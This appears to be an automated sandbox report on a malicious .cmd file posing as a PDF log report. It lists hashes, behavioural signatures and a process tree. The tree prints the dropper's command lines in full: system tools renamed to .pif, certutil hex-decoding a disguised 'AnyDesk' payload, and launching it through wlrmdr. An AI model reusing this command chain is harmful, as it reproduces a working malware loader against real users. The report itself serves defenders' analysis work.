Analysis
- max time kernel: 119s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 20/01/2025, 06:25
Static task: static1
Behavioral task behavioral1
- Sample: MT Lesley CT.rar
- Resource: win7-20240903-en
Behavioral task behavioral2
- Sample: MT Lesley CT.rar
- Resource: win10v2004-20241007-en
Behavioral task behavioral3
- Sample: MF-HF malfunction LOG Report,PDF.cmd
- Resource: win7-20240903-en
Behavioral task behavioral4
- Sample: MF-HF malfunction LOG Report,PDF.cmd
- Resource: win10v2004-20241007-en
General
- Target: MF-HF malfunction LOG Report,PDF.cmd
- Size: 2.7MB
- MD5: 52c4a6ab8615c5f10087756a5506a81d
- SHA1: 4edc7261d4b1f624d94099071e5752fbc5864fae
- SHA256: b7aa6671b0d47e966e51c97c069edff139d312e7707ffbc22fb2392b3004021a
- SHA512: b542b3b361dac98ac1db9517aeac1bfec3dab4f3439729f466a225550e1c0b486bf662989bc15f51d25842fedca09087105bd81a48a13a9632f0167375ce39ef
- SSDEEP: 24576:ybei0ej3l3KRE+5WyHCN51BPTjF0Sj2dkucbo0063u9wN6UFfbDXRCDy:ybeiJjERE+q51SdvmYUz
Malware Config
Signatures
- Executes dropped EXE (5 IoCs)
  pid / Process: 1580 alpha.pif; 536 phf.pif; 2736 alpha.pif; 2876 phf.pif; 2612 awpha.pif
- Loads dropped DLL (5 IoCs)
  pid / Process: 2688 cmd.exe; 1580 alpha.pif; 2688 cmd.exe; 2736 alpha.pif; 2688 cmd.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 1 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  pid / Process: 2628 PING.EXE
- Runs ping.exe (1 TTPs, 1 IoCs)
  pid / Process: 2628 PING.EXE
- Suspicious use of FindShellTrayWindow (4 IoCs)
  pid / Process: 2612 awpha.pif (recorded 4 times)
- Suspicious use of SendNotifyMessage (4 IoCs)
  pid / Process: 2612 awpha.pif (recorded 4 times)
- Suspicious use of WriteProcessMemory (27 IoCs)
  description: "PID <pid> wrote to memory of <target PID>"; each distinct pair below is recorded three times in the report, giving 27 entries

  pid   Process    wrote to PID   procid_target
  2688  cmd.exe    2324           32
  2688  cmd.exe    2284           33
  2688  cmd.exe    3048           34
  2688  cmd.exe    1580           35
  1580  alpha.pif  536            36
  2688  cmd.exe    2736           37
  2736  alpha.pif  2876           38
  2688  cmd.exe    2612           39
  2688  cmd.exe    2628           40
Processes (process tree; nesting shows parent/child relationship)

1. C:\Windows\system32\cmd.exe
   cmd /c "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd"
   PID: 2688
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\system32\extrac32.exe
      extrac32.exe /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"
      PID: 2324

   2. C:\Windows\system32\extrac32.exe
      extrac32.exe /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
      PID: 2284

   2. C:\Windows\system32\extrac32.exe
      extrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif"
      PID: 3048

   2. C:\Users\Public\alpha.pif
      C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
      PID: 1580
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Public\phf.pif
         C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
         PID: 536
         - Executes dropped EXE

   2. C:\Users\Public\alpha.pif
      C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
      PID: 2736
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Public\phf.pif
         C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
         PID: 2876
         - Executes dropped EXE

   2. C:\Users\Public\awpha.pif
      "C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif
      PID: 2612
      - Executes dropped EXE
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage

   2. C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 5
      PID: 2628
      - System Network Configuration Discovery: Internet Connection Discovery
      - Runs ping.exe
Network
MITRE ATT&CK Enterprise v15
Downloads